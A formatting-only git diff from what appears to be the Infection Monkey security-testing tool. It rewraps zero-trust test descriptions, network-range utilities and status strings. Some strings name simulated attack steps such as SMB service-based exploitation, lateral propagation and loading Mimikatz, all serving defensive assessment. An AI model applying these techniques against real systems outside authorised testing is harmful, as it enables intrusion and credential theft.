+ PRINCIPLE_USERS_MAC_POLICIES:"Users' permissions to the network and to resources "
+ "should be MAC (Mandatory "
+ "Access Control) only.",
+ PRINCIPLE_DISASTER_RECOVERY:"Ensure data and infrastructure backups for disaster "
+ "recovery scenarios.",
+ PRINCIPLE_SECURE_AUTHENTICATION:"Ensure secure authentication process's.",
+ PRINCIPLE_MONITORING_AND_LOGGING:"Ensure monitoring and logging in network resources.",
}
POSSIBLE_STATUSES_KEY = "possible_statuses"
@@ -98,184 +107,206 @@ PRINCIPLE_KEY = "principle_key"
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
TEST_EXPLANATION_KEY = "explanation"
TESTS_MAP = {
- TEST_SEGMENTATION: {
- TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
- "running on, that belong to different network segments.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
- STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.",
+ TEST_SEGMENTATION:{
+ TEST_EXPLANATION_KEY:"The Monkey tried to scan and find machines that it can "
+ "communicate with from the machine it's "
+ "running on, that belong to different network segments.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey performed cross-segment communication. Check firewall rules and"
+ " logs.",
+ STATUS_PASSED:"Monkey couldn't perform cross-segment communication. If relevant, "
+ "check firewall logs.",
},
- PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION,
- PILLARS_KEY: [NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
+ PRINCIPLE_KEY:PRINCIPLE_SEGMENTATION,
+ PILLARS_KEY:[NETWORKS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED],
},
- TEST_MALICIOUS_ACTIVITY_TIMELINE: {
- TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
- "exploitation.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
+ TEST_MALICIOUS_ACTIVITY_TIMELINE:{
+ TEST_EXPLANATION_KEY:"The Monkeys in the network performed malicious-looking "
+ "actions, like scanning and attempting "
+ "exploitation.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_VERIFY:"Monkey performed malicious actions in the network. Check SOC logs and "
+ "alerts."
},
- PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
- PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
+ PRINCIPLE_KEY:PRINCIPLE_ANALYZE_NETWORK_TRAFFIC,
+ PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
- TEST_ENDPOINT_SECURITY_EXISTS: {
- TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
- "software on endpoints.",
- STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
- "security concern. ",
+ TEST_ENDPOINT_SECURITY_EXISTS:{
+ TEST_EXPLANATION_KEY:"The Monkey checked if there is an active process of an "
+ "endpoint security software.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey didn't find ANY active endpoint security processes. Install and "
+ "activate anti-virus "
+ "software on endpoints.",
+ STATUS_PASSED:"Monkey found active endpoint security processes. Check their logs to "
+ "see if Monkey was a "
+ "security concern. ",
},
- PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
- PILLARS_KEY: [DEVICES],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
+ PILLARS_KEY:[DEVICES],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_MACHINE_EXPLOITED: {
- TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
- "which endpoints were compromised.",
- STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.",
+ TEST_MACHINE_EXPLOITED:{
+ TEST_EXPLANATION_KEY:"The Monkey tries to exploit machines in order to "
+ "breach them and propagate in the network.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey successfully exploited endpoints. Check IDS/IPS logs to see "
+ "activity recognized and see "
+ "which endpoints were compromised.",
+ STATUS_PASSED:"Monkey didn't manage to exploit an endpoint.",
},
- PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
- PILLARS_KEY: [DEVICES],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
+ PRINCIPLE_KEY:PRINCIPLE_ENDPOINT_SECURITY,
+ PILLARS_KEY:[DEVICES],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY],
},
- TEST_SCHEDULED_EXECUTION: {
- TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
- "software.",
- STATUS_PASSED: "Monkey failed to execute in a scheduled manner.",
+ TEST_SCHEDULED_EXECUTION:{
+ TEST_EXPLANATION_KEY:"The Monkey was executed in a scheduled manner.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_VERIFY:"Monkey was executed in a scheduled manner. Locate this activity in "
+ "User-Behavior security "
+ "software.",
+ STATUS_PASSED:"Monkey failed to execute in a scheduled manner.",
},
- PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
- PILLARS_KEY: [PEOPLE, NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY],
+ PRINCIPLE_KEY:PRINCIPLE_USER_BEHAVIOUR,
+ PILLARS_KEY:[PEOPLE, NETWORKS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_VERIFY],
},
- TEST_DATA_ENDPOINT_ELASTIC: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
- "that indicate attempts to access them. ",
+ TEST_DATA_ENDPOINT_ELASTIC:{
+ TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to "
+ "ElasticSearch instances.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey accessed ElasticSearch instances. Limit access to data by "
+ "encrypting it in in-transit.",
+ STATUS_PASSED:"Monkey didn't find open ElasticSearch instances. If you have such "
+ "instances, look for alerts "
+ "that indicate attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY:[DATA],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_DATA_ENDPOINT_HTTP: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
- "attempts to access them. ",
+ TEST_DATA_ENDPOINT_HTTP:{
+ TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to HTTP " "servers.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey accessed HTTP servers. Limit access to data by encrypting it in"
+ " in-transit.",
+ STATUS_PASSED:"Monkey didn't find open HTTP servers. If you have such servers, "
+ "look for alerts that indicate "
+ "attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY:[DATA],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_DATA_ENDPOINT_POSTGRESQL: {
- TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.",
- STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that "
- "indicate attempts to access them. ",
+ TEST_DATA_ENDPOINT_POSTGRESQL:{
+ TEST_EXPLANATION_KEY:"The Monkey scanned for unencrypted access to " "PostgreSQL servers.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey accessed PostgreSQL servers. Limit access to data by encrypting"
+ " it in in-transit.",
+ STATUS_PASSED:"Monkey didn't find open PostgreSQL servers. If you have such servers, "
+ "look for alerts that "
+ "indicate attempts to access them. ",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY:[DATA],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_TUNNELING: {
- TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
- "restrict them. "
+ TEST_TUNNELING:{
+ TEST_EXPLANATION_KEY:"The Monkey tried to tunnel traffic using other monkeys.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey tunneled its traffic using other monkeys. Your network policies "
+ "are too permissive - "
+ "restrict them. "
},
- PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
- PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED],
+ PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
+ PILLARS_KEY:[NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED],
},
- TEST_COMMUNICATE_AS_NEW_USER: {
- TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
- "restrict them to MAC only.",
- STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.",
+ TEST_COMMUNICATE_AS_NEW_USER:{
+ TEST_EXPLANATION_KEY:"The Monkey tried to create a new user and communicate "
+ "with the internet from it.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"Monkey caused a new user to access the network. Your network policies "
+ "are too permissive - "
+ "restrict them to MAC only.",
+ STATUS_PASSED:"Monkey wasn't able to cause a new user to access the network.",
},
- PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
- PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
+ PILLARS_KEY:[PEOPLE, NETWORKS, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: {
- TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.",
- STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.",
+ TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES:{
+ TEST_EXPLANATION_KEY:"ScoutSuite assessed cloud firewall rules and settings.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found overly permissive firewall rules.",
+ STATUS_PASSED:"ScoutSuite found no problems with cloud firewall rules.",
},
- PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
- PILLARS_KEY: [NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
+ PILLARS_KEY:[NETWORKS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_UNENCRYPTED_DATA: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found resources with unencrypted data.",
- STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.",
+ TEST_SCOUTSUITE_UNENCRYPTED_DATA:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for resources containing " "unencrypted data.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found resources with unencrypted data.",
+ STATUS_PASSED:"ScoutSuite found no resources with unencrypted data.",
},
- PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_DATA_CONFIDENTIALITY,
+ PILLARS_KEY:[DATA],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found resources not protected against data loss.",
- STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.",
+ TEST_SCOUTSUITE_DATA_LOSS_PREVENTION:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for resources which are not "
+ "protected against data loss.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found resources not protected against data loss.",
+ STATUS_PASSED:"ScoutSuite found that all resources are secured against data loss.",
},
- PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY,
- PILLARS_KEY: [DATA],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_DISASTER_RECOVERY,
+ PILLARS_KEY:[DATA],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_SECURE_AUTHENTICATION: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found issues related to users' authentication.",
- STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.",
+ TEST_SCOUTSUITE_SECURE_AUTHENTICATION:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for issues related to users' " "authentication.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found issues related to users' authentication.",
+ STATUS_PASSED:"ScoutSuite found no issues related to users' authentication.",
},
- PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION,
- PILLARS_KEY: [PEOPLE, WORKLOADS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_SECURE_AUTHENTICATION,
+ PILLARS_KEY:[PEOPLE, WORKLOADS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_RESTRICTIVE_POLICIES: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for permissive user access policies.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found permissive user access policies.",
- STATUS_PASSED: "ScoutSuite found no issues related to user access policies.",
+ TEST_SCOUTSUITE_RESTRICTIVE_POLICIES:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for permissive user access " "policies.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found permissive user access policies.",
+ STATUS_PASSED:"ScoutSuite found no issues related to user access policies.",
},
- PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
- PILLARS_KEY: [PEOPLE, WORKLOADS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_USERS_MAC_POLICIES,
+ PILLARS_KEY:[PEOPLE, WORKLOADS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_LOGGING: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for issues, related to logging.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found logging issues.",
- STATUS_PASSED: "ScoutSuite found no logging issues.",
+ TEST_SCOUTSUITE_LOGGING:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for issues, related to logging.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found logging issues.",
+ STATUS_PASSED:"ScoutSuite found no logging issues.",
},
- PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
- PILLARS_KEY: [AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
+ PILLARS_KEY:[AUTOMATION_ORCHESTRATION, VISIBILITY_ANALYTICS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
- TEST_SCOUTSUITE_SERVICE_SECURITY: {
- TEST_EXPLANATION_KEY: "ScoutSuite searched for service security issues.",
- FINDING_EXPLANATION_BY_STATUS_KEY: {
- STATUS_FAILED: "ScoutSuite found service security issues.",
- STATUS_PASSED: "ScoutSuite found no service security issues.",
+ TEST_SCOUTSUITE_SERVICE_SECURITY:{
+ TEST_EXPLANATION_KEY:"ScoutSuite searched for service security issues.",
+ FINDING_EXPLANATION_BY_STATUS_KEY:{
+ STATUS_FAILED:"ScoutSuite found service security issues.",
+ STATUS_PASSED:"ScoutSuite found no service security issues.",
},
- PRINCIPLE_KEY: PRINCIPLE_MONITORING_AND_LOGGING,
- PILLARS_KEY: [DEVICES, NETWORKS],
- POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
+ PRINCIPLE_KEY:PRINCIPLE_MONITORING_AND_LOGGING,
+ PILLARS_KEY:[DEVICES, NETWORKS],
+ POSSIBLE_STATUSES_KEY:[STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED],
},
}
@@ -284,13 +315,13 @@ EVENT_TYPE_MONKEY_LOCAL = "monkey_local"
EVENT_TYPES = (EVENT_TYPE_MONKEY_LOCAL, EVENT_TYPE_MONKEY_NETWORK)
PILLARS_TO_TESTS = {
- DATA: [],
- PEOPLE: [],
- NETWORKS: [],
- DEVICES: [],
- WORKLOADS: [],
- VISIBILITY_ANALYTICS: [],
- AUTOMATION_ORCHESTRATION: [],
+ DATA:[],
+ PEOPLE:[],
+ NETWORKS:[],
+ DEVICES:[],
+ WORKLOADS:[],
+ VISIBILITY_ANALYTICS:[],
+ AUTOMATION_ORCHESTRATION:[],
}
PRINCIPLES_TO_TESTS = {}
diff --git a/monkey/common/network/network_range.py b/monkey/common/network/network_range.py
index 581c4bf77..34a415272 100644
--- a/monkey/common/network/network_range.py
+++ b/monkey/common/network/network_range.py
@@ -99,7 +99,7 @@ class IpRange(NetworkRange):
addresses = ip_range.split("-")
if len(addresses) != 2:
raise ValueError(
- "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
+ "Illegal IP range format: %s. Format is 192.168.0.5-192.168.0.20" % ip_range
)
self._lower_end_ip, self._higher_end_ip = [x.strip() for x in addresses]
elif (lower_end_ip is not None) and (higher_end_ip is not None):
@@ -112,8 +112,8 @@ class IpRange(NetworkRange):
self._higher_end_ip_num = self._ip_to_number(self._higher_end_ip)
if self._higher_end_ip_num < self._lower_end_ip_num:
raise ValueError(
- "Higher end IP %s is smaller than lower end IP %s"
- % (self._lower_end_ip, self._higher_end_ip)
+ "Higher end IP %s is smaller than lower end IP %s"
+ % (self._lower_end_ip, self._higher_end_ip)
)
def __repr__(self):
@@ -159,7 +159,8 @@ class SingleIpRange(NetworkRange):
@staticmethod
def string_to_host(string_):
"""
- Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
+ Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name
+ and ip
:param string_: String that was entered in "Scan IP/subnet list"
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
"""
@@ -176,8 +177,8 @@ class SingleIpRange(NetworkRange):
domain_name = string_
except socket.error:
LOG.error(
- "Your specified host: {} is not found as a domain name and"
- " it's not an IP address".format(string_)
+ "Your specified host: {} is not found as a domain name and"
+ " it's not an IP address".format(string_)
)
return None, string_
# If a string_ was entered instead of IP we presume that it was domain name and translate it
diff --git a/monkey/common/network/network_utils.py b/monkey/common/network/network_utils.py
index 6aa5076ae..2b01d1974 100644
--- a/monkey/common/network/network_utils.py
+++ b/monkey/common/network/network_utils.py
@@ -4,8 +4,10 @@ from urllib.parse import urlparse
def get_host_from_network_location(network_location: str) -> str:
"""
- URL structure is ":///;?#" (https://tools.ietf.org/html/rfc1808.html)
- And the net_loc is ":@:" (https://tools.ietf.org/html/rfc1738#section-3.1)
+ URL structure is ":///;?#" (
+ https://tools.ietf.org/html/rfc1808.html)
+ And the net_loc is ":@:" (
+ https://tools.ietf.org/html/rfc1738#section-3.1)
:param network_location: server network location
:return: host part of the network location
"""
diff --git a/monkey/common/network/segmentation_utils.py b/monkey/common/network/segmentation_utils.py
index 9bbaabf1d..d48c005cb 100644
--- a/monkey/common/network/segmentation_utils.py
+++ b/monkey/common/network/segmentation_utils.py
@@ -14,8 +14,10 @@ def get_ip_in_src_and_not_in_dst(ip_addresses, source_subnet, target_subnet):
def get_ip_if_in_subnet(ip_addresses, subnet):
"""
:param ip_addresses: IP address list.
- :param subnet: Subnet to check if one of ip_addresses is in there. This is common.network.network_range.NetworkRange
- :return: The first IP in ip_addresses which is in the subnet if there is one, otherwise returns None.
+ :param subnet: Subnet to check if one of ip_addresses is in there. This is
+ common.network.network_range.NetworkRange
+ :return: The first IP in ip_addresses which is in the subnet if there is one, otherwise
+ returns None.
"""
for ip_address in ip_addresses:
if subnet.is_in_range(ip_address):
diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py
index c911ed780..c30ab36f8 100644
--- a/monkey/common/utils/attack_utils.py
+++ b/monkey/common/utils/attack_utils.py
@@ -14,27 +14,29 @@ class ScanStatus(Enum):
class UsageEnum(Enum):
SMB = {
- ScanStatus.USED.value: "SMB exploiter ran the monkey by creating a service via MS-SCMR.",
- ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR.",
+ ScanStatus.USED.value:"SMB exploiter ran the monkey by creating a service via MS-SCMR.",
+ ScanStatus.SCANNED.value:"SMB exploiter failed to run the monkey by creating a service "
+ "via MS-SCMR.",
}
MIMIKATZ = {
- ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.",
- ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed.",
+ ScanStatus.USED.value:"Windows module loader was used to load Mimikatz DLL.",
+ ScanStatus.SCANNED.value:"Monkey tried to load Mimikatz DLL, but failed.",
}
MIMIKATZ_WINAPI = {
- ScanStatus.USED.value: "WinAPI was called to load mimikatz.",
- ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz.",
+ ScanStatus.USED.value:"WinAPI was called to load mimikatz.",
+ ScanStatus.SCANNED.value:"Monkey tried to call WinAPI to load mimikatz.",
}
DROPPER = {
- ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+ ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
SINGLETON_WINAPI = {
- ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.",
- ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton"
- " for monkey process wasn't successful.",
+ ScanStatus.USED.value:"WinAPI was called to acquire system singleton for monkey's "
+ "process.",
+ ScanStatus.SCANNED.value:"WinAPI call to acquire system singleton"
+ " for monkey process wasn't successful.",
}
DROPPER_WINAPI = {
- ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."
+ ScanStatus.USED.value:"WinAPI was used to mark monkey files for deletion on next boot."
}
diff --git a/monkey/common/utils/mongo_utils.py b/monkey/common/utils/mongo_utils.py
index a76548738..73f0dd9f7 100644
--- a/monkey/common/utils/mongo_utils.py
+++ b/monkey/common/utils/mongo_utils.py
@@ -35,8 +35,8 @@ class MongoUtils:
# objectSid property of ds_user is problematic and need this special treatment.
# ISWbemObjectEx interface. Class Uint8Array ?
if (
- str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
- == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
+ str(o._oleobj_.GetTypeInfo().GetTypeAttr().iid)
+ == "{269AD56A-8A67-4129-BC8C-0506DCFE9880}"
):
return o.Value
except Exception:
diff --git a/monkey/common/version.py b/monkey/common/version.py
index 4070fc2f6..228163e9a 100644
--- a/monkey/common/version.py
+++ b/monkey/common/version.py
@@ -1,4 +1,5 @@
-# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for details).
+# To get the version from shell, run `python ./version.py` (see `python ./version.py -h` for
+# details).
import argparse
from pathlib import Path
@@ -17,7 +18,8 @@ def get_version(build=BUILD):
def print_version():
parser = argparse.ArgumentParser()
parser.add_argument(
- "-b", "--build", default=BUILD, help="Choose the build string for this version.", type=str
+ "-b", "--build", default=BUILD, help="Choose the build string for this version.",
+ type=str
)
args = parser.parse_args()
print(get_version(args.build))
diff --git a/monkey/infection_monkey/config.py b/monkey/infection_monkey/config.py
index 7aeaccee2..ffdea551e 100644
--- a/monkey/infection_monkey/config.py
+++ b/monkey/infection_monkey/config.py
@@ -227,7 +227,8 @@ class Configuration(object):
@staticmethod
def hash_sensitive_data(sensitive_data):
"""
- Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data plain-text, as the log is
+ Hash sensitive data (e.g. passwords). Used so the log won't contain sensitive data
+ plain-text, as the log is
saved on client machines plain-text.
:param sensitive_data: the data to hash.
diff --git a/monkey/infection_monkey/control.py b/monkey/infection_monkey/control.py
index 4ccd2bec4..cc98c5e6d 100644
--- a/monkey/infection_monkey/control.py
+++ b/monkey/infection_monkey/control.py
@@ -23,7 +23,6 @@ from infection_monkey.utils.exceptions.planned_shutdown_exception import Planned
__author__ = "hoffer"
-
requests.packages.urllib3.disable_warnings()
LOG = logging.getLogger(__name__)
@@ -32,7 +31,8 @@ DOWNLOAD_CHUNK = 1024
PBA_FILE_DOWNLOAD = "https://%s/api/pba/download/%s"
# random number greater than 5,
-# to prevent the monkey from just waiting forever to try and connect to an island before going elsewhere.
+# to prevent the monkey from just waiting forever to try and connect to an island before going
+# elsewhere.
TIMEOUT_IN_SECONDS = 15
@@ -52,32 +52,32 @@ class ControlClient(object):
